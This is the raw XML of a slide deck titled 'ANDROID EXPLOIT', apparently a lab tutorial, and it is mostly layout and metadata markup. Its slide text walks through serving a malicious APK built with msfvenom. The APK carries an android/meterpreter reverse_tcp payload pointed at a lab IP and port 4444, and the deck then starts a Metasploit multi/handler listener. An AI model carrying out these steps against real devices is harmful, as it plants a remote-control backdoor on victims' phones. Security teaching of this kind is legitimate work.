          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496518" y="1599457"/>
            <a:ext cx="3298684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Run apache2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77DED-3839-41F9-A62F-3179DC26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42" y="1668147"/>
            <a:ext cx="4505954" cy="67636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F78CA11-58CC-4BC6-8C0E-02E566CAE443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496518" y="2711809"/>
            <a:ext cx="3522971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Check if android platform is available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4713C-0DE0-477F-AB75-53DA7296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21" y="2510431"/>
            <a:ext cx="2769787" cy="19897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0E581FD-46A1-4B8B-8C51-4E52BBFCE0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496517" y="5182653"/>
            <a:ext cx="3522971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Check android platform payloads type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AF83FB-39D4-43E8-B6F6-48D37A4DA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21" y="4639312"/>
            <a:ext cx="7585366" cy="18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D304BF3-9847-410F-9E9B-814F7A37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8" y="347265"/>
            <a:ext cx="8209293" cy="706293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Create malware payload - msfvenom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D85443-11A1-475D-9611-3D209CF1AA77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432099" y="1289182"/>
            <a:ext cx="8209293" cy="2139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Create apk payload and save into var/www/html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-p is a payload to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android/meterpreter/reverse_tcp is a payload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LHOST=172.16.238.10 is the IP address to receve back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LPORT=4444 is the local port. On this port the hacker listen for the victim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R is raw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Var/www/html is the location to save apk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FC799-AD2E-4352-9748-D75524F2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1" y="3640347"/>
            <a:ext cx="10375558" cy="1737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76DC0-D594-45FC-BF06-00463F9A431C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432099" y="5745193"/>
            <a:ext cx="583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After this command will be create a malicious app.apk file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7734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F764-6F37-4D91-BEF0-F3AFB97C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681"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Start metasploit console and launch exploit/multi/handler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4980E-2EEB-48D6-B6CB-E487DD1B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374989"/>
            <a:ext cx="4869873" cy="410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81776-9457-419B-B463-1C779F47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1" y="1374989"/>
            <a:ext cx="673511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8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057E0-5E9C-4146-A882-DFB232E9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20" y="965199"/>
            <a:ext cx="2426843" cy="49276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2DCC0-44B5-45DE-BAFB-70B3A0E6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41" y="965199"/>
            <a:ext cx="2476629" cy="49286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D81BE-FA81-4B1E-AE4F-5B971CC7C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061" y="965199"/>
            <a:ext cx="247611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408E3-B110-48F2-9FFE-4B14B7AA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01" y="965199"/>
            <a:ext cx="2451481" cy="49276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79796-E9E2-4FDE-97C5-B2549723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41" y="965199"/>
            <a:ext cx="2476629" cy="49286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59F7D-C103-4C35-BBA8-15E122068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061" y="965199"/>
            <a:ext cx="247611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73CAC719E104AB4BE2257CC9BF261" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8e2e94a4ecd491780b9cded847577883">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="961da857-d0ba-45c2-8727-6192de1e69a1" xmlns:ns4="eb4eef42-153e-44ac-b8fd-ef0ee20a0651" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ef19ad59905126d25ec8acbdc0d75d29" ns3:_="" ns4:_="">
    <xsd:import namespace="961da857-d0ba-45c2-8727-6192de1e69a1"/>
    <xsd:import namespace="eb4eef42-153e-44ac-b8fd-ef0ee20a06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da857-d0ba-45c2-8727-6192de1e6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eef42-153e-44ac-b8fd-ef0ee20a0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720296-4A54-4801-9935-B502E95DCC43}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="961da857-d0ba-45c2-8727-6192de1e69a1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b4eef42-153e-44ac-b8fd-ef0ee20a065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8DCE94C-96ED-48B4-996F-3A482E2AA6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C5345-FB9F-4701-89BB-2527788E3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1da857-d0ba-45c2-8727-6192de1e69a1"/>
    <ds:schemaRef ds:uri="eb4eef42-153e-44ac-b8fd-ef0ee20a06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ANDROID EXPLOIT</vt:lpstr>
      <vt:lpstr>Objective and Requirements</vt:lpstr>
      <vt:lpstr>Deploy</vt:lpstr>
      <vt:lpstr>Start compose</vt:lpstr>
      <vt:lpstr>Create malware payload - msfvenom</vt:lpstr>
      <vt:lpstr>Create malware payload - msfvenom</vt:lpstr>
      <vt:lpstr>Start metasploit console and launch exploit/multi/handler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EXPLOIT</dc:title>
  <dc:creator>LUCA CONTE</dc:creator>
  <cp:lastModifiedBy>LUCA CONTE</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-31T15:52:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-31T19:28:43Z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0x010100A9973CAC719E104AB4BE2257CC9BF261</vt:lpwstr>
  </property>
</Properties>
</file>